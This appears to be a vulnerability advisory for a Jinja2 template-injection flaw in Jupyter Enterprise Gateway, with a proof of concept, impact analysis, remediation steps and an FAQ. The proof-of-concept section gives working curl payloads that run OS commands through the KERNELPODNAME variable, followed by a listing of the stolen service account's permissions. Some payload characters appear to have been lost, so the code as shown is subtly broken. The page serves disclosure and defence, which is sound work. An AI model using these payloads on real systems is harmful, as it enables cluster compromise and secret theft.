CVE-2026-44181: Jupyter Enterprise Gateway: Jinja2 Template Server Side Template Injection results in Remote Code Execution
Summary
The environment variables (KERNELXXX) used during the rendering of the Kubernetes manifest are vulnerable to Server Side Template Injection (SSTI). By including Jinja2 template expressions it is possible to execution Python code and OS Commands in the Enterprise Gateway service. The code can use or steal the Kubernetes service account token, which can steal Kubernetes secrets and be used to fully compromise the Kubernetes cluster by scheduling a privileged pod or a pod with a hostPath volume mount.
Details
The KERNELPODNAME variable is rendered using Jinja2, allowing for code execution via template expression statements, in this code: https://github.com/jupyter-server/enterprisegateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprisegateway/services/processproxies/k8s.py#L219-L247
The Jinja2 template for the Kubernetes manifest contains several kernelxxx variables, in addition to kernelpodname discussed above, such as kernelworkingdir that are used when rendering the manifest and are all vectors for SSTI. https://github.com/jupyter-server/enterprisegateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L77
These values come from the environment passed in the API call, where they were KERNELXXX before being converted to lowercase.
https://github.com/jupyter-server/enterprisegateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/launchkubernetes.py#L130-L137
PoC
Simple demonstration of SSTI using {{7 7}}
bash curl http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels --data '{"name":"pythonkubernetes", "env": {"KERNELPODNAME": "bdawg-{{7 7}}" }}'
json {"id": "1094076f-35c6-48a5-ae60-0c943bb97a9a", "name": "pythonkubernetes", "lastactivity": "2025-07-17T07:14:42.155736Z", "executionstate": "starting", "connections": 0}
Running kubectl get pods NAME READY STATUS RESTARTS AGE bdawg-49 1/1 Running 0 3m54s
Remote code execution - OS Commands via SSTI
bash curl http://enterprise-gateway.notebooks.svc.cluster.local:8888/api/kernels --data '{"name":"pythonkubernetes", "env": {"KERNELPODNAME": "bdawg-{{ cycler.init.globals.os.popen(\"hostname\").read() }}", "KERNELNAMESPACE": "notebooks" }}'
json {"id": "85ec9431-d005-48d5-8127-5f022f2c5780", "name": "pythonkubernetes", "lastactivity": "2025-07-17T07
NAME READY STATUS RESTARTS AGE bdawg-enterprise-gateway-8695685bc8-klm4m 1/1 Running 0 2m25s
enterprise-gateway-8695685bc8-klm4m is the hostname of the Enterprise Gateway pod.
Enterprise Gateway RBAC The Enterprise Gateway service account has R/W access to several resource kinds.
Stolen Enterprise Gateway service account kubectl auth can-i --list
Resources Non-Resource URLs Resource Names Verbs selfsubjectreviews.authentication.k8s.io [] [] [create] selfsubjectaccessreviews.authorization.k8s.io [] [] [create] selfsubjectrulesreviews.authorization.k8s.io [] [] [create] rolebindings.rbac.authorization.k8s.io [] [] [get list create delete] configmaps [] [] [get watch list create delete] namespaces [] [] [get watch list create delete] persistentvolumeclaims [] [] [get watch list create delete] persistentvolumes [] [] [get watch list create delete] pods [] [] [get watch list create delete] secrets [] [] [get watch list create delete] services [] [] [get watch list create delete] scheduledsparkapplications.sparkoperator.k8s.io/status [] [] [get watch list create delete] scheduledsparkapplications.sparkoperator.k8s.io [] [] [get watch list create delete] sparkapplications.sparkoperator.k8s.io/status [] [] [get watch list create delete] sparkapplications.sparkoperator.k8s.io [] [] [get watch list create delete] [/.well-known/openid-configuration/] [] [get] [/.well-known/openid-configuration] [] [get] [/api/] [] [get] [/api] [] [get] [/apis/] [] [get] [/apis] [] [get] [/healthz] [] [get] [/healthz] [] [get] [/livez] [] [get] [/livez] [] [get] [/openapi/] [] [get] [/openapi] [] [get] [/openid/v1/jwks/] [] [get] [/openid/v1/jwks] [] [get] [/readyz] [] [get] [/readyz] [] [get] [/version/] [] [get] [/version/] [] [get] [/version] [] [get] [/version] [] [get]
Impact This is a server side template injection that leads to remote code execution (python and OS commands).
An attacker can get remote code execution in the Enterprise Gateway pod and steal its Kubernetes service account's token. It can use the privileges to spy on and interfere with other Jupyter kernel, read, write, or delete configuration maps, read secrets, access persistent storage, privileged pods, or create pods with hostPath mounts, which can be used to compromise the complete cluster and all workloads on it.
Other sources
Jupyter Enterprise Gateway launches remote Jupyter Notebook kernels across distributed clusters like Apache Spark, Kubernetes, and Docker Swarm. In versions 2.0.0rc2 and above, prior to 3.3.0, the environment variables (KERNELXXX) used during the rendering of the Kubernetes manifest are vulnerable to Server Side Template Injection (SSTI). By including Jinja2 template expressions it is possible to execution Python code and OS Commands in the Enterprise Gateway service. The code can use or steal the Kubernetes service account token, which can steal Kubernetes secrets and be used to fully compromise the Kubernetes cluster by scheduling a privileged pod or a pod with a hostPath volume mount. This issue has been fixed in version 3.3.0.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
pip/jupyter_enterprise_gatewayto a version that resolves this vulnerability.Fixed in 3.3.0 - Upgrade
Upgrade to a fixed release to a version that resolves this vulnerability.
Fixed in 3.3.0 - Compensating control
If you believe the Enterprise Gateway pod may be compromised, use the Enterprise Gateway service account token only after upgrading to 3.3.0; otherwise assume an attacker may have stolen the Kubernetes service account token and used it to access secrets or create privileged/hostPath pods.
Event History
Frequently Asked Questions
What is the severity of CVE-2026-44181?
CVE-2026-44181 has a risk score of 92, indicating a high severity vulnerability.
How do I fix CVE-2026-44181?
To mitigate CVE-2026-44181, update the Jupyter Enterprise Gateway to a patched version that addresses SSTI issues.
What kind of attacks can occur due to CVE-2026-44181?
CVE-2026-44181 can lead to Server Side Template Injection attacks, allowing attackers to execute arbitrary Python code and OS commands.
What software is affected by CVE-2026-44181?
CVE-2026-44181 affects the Jupyter Enterprise Gateway software when rendering Kubernetes manifests.
When was CVE-2026-44181 published?
CVE-2026-44181 was published on June 3, 2026.